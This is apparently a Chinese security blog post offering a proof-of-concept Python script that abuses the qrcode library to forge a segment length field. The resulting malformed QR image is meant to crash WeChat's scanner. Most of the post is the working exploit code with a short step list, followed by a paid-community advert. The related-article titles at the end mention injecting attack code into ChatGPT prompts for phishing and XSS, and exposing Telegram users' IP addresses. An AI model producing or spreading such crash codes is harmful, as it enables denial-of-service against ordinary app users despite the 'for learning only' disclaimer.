注:代码可能带有破坏性,仅用于学习,分析用途。
微信崩溃了?微信最新版二维码Bug,不知道问题在哪里。使用下面代码,轻松帮你复现。
使用poc生成代码
安装qrcode
pip isntall qrcode生成代码:
import qrcodefrom qrcode.util import QRData, MODE_NUMBER, MODE_8BIT_BYTEdef nvwu_put(self, num, length):if num == 0:num = 233 # 制造一个伪造的长度for i in range(length):self.put_bit(((num >> (length - i - 1)) & 1) == 1)qrcode.util.BitBuffer.put = nvwu_putdef anquannvwu():qr = qrcode.QRCode(2, qrcode.constants.ERROR_CORRECT_M, mask_pattern=0)num_data = QRData('1145141', MODE_NUMBER)data = QRData(b'.', MODE_8BIT_BYTE)hack_data = QRData(b'', MODE_8BIT_BYTE)# 确保所有数据都适应这个版本的最大内容长度qr.add_data(num_data)qr.add_data(data)qr.add_data(num_data)qr.add_data(data)qr.add_data(num_data)qr.add_data(data)qr.add_data(num_data)# 添加一个零长度的数据,使得数据的长度为233qr.add_data(hack_data)img = qr.make_image()img.save("./poc1.png")if __name__ == "__main__":anquannvwu()
上面的代码做了以下工作:
1. 创建一个新的QR码,纠错等级为M,掩码模式为0。
2. 创建一个新的QR数据,字符串为'1145141',模式为MODE_NUMBER。
3. 创建一个新的QR数据,字符串为'.',模式为MODE_8BIT_BYTE。
4. 创建一个新的QR数据,字符串为空,模式为MODE_8BIT_BYTE。
如果你喜欢巫巫的原创文章,推荐加入巫巫的社群(72小时内可申请退款)。
▎ 我建立这个星球来沉淀有价值的内容,更好地帮助小伙伴提升自己。
▎ 很多小伙伴都添加我的微信,向我提问越来越多,随便回答不太好,如果不回答也不好,如果都仔细回答,是真的回答不过来!
▎ 后来发现可以建立知识星球,我会花费时间在这个星球上用以解决这一问题。
▎ 星球里将提供:
1.高纬度的网络安全思维模式
2.SRC漏洞挖掘、CTF靶机攻克、企业安全建设、网络边界安全、GAN网络、web3.0安全、企业安全运营、打击涉网犯罪等行业全知识面覆盖
3.高质量的问题交流、导师级顾问服务
合抱之木,生于毫末。
九层之台,起于累土。
每一次努力和积累,都是在为网络安全领域的发展贡献自己的一份力量。
感谢您一直以来的支持和关注!
从Prompt注入到命令执行:探究LLM大型语言模型中 OpenAI的风险点
如何在TG群中获取用户真实IP?这些手段教你轻松实现【附代码】
防范虚拟货币钱包盗窃:揭秘非Approve的新型盗U诈骗手段(终极版)
【欺负老实人】在chatgpt Prompt中注入攻击代码,截取跟踪用户信息,钓鱼XSS。
我使用ChatGPT审计代码发现了200多个安全漏洞(GPT-4与GPT-3对比报告)
原文始发于微信公众号(安全女巫):【利用代码】微信bug二维码崩溃漏洞?你要的poc来了!生成自己的二维码
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论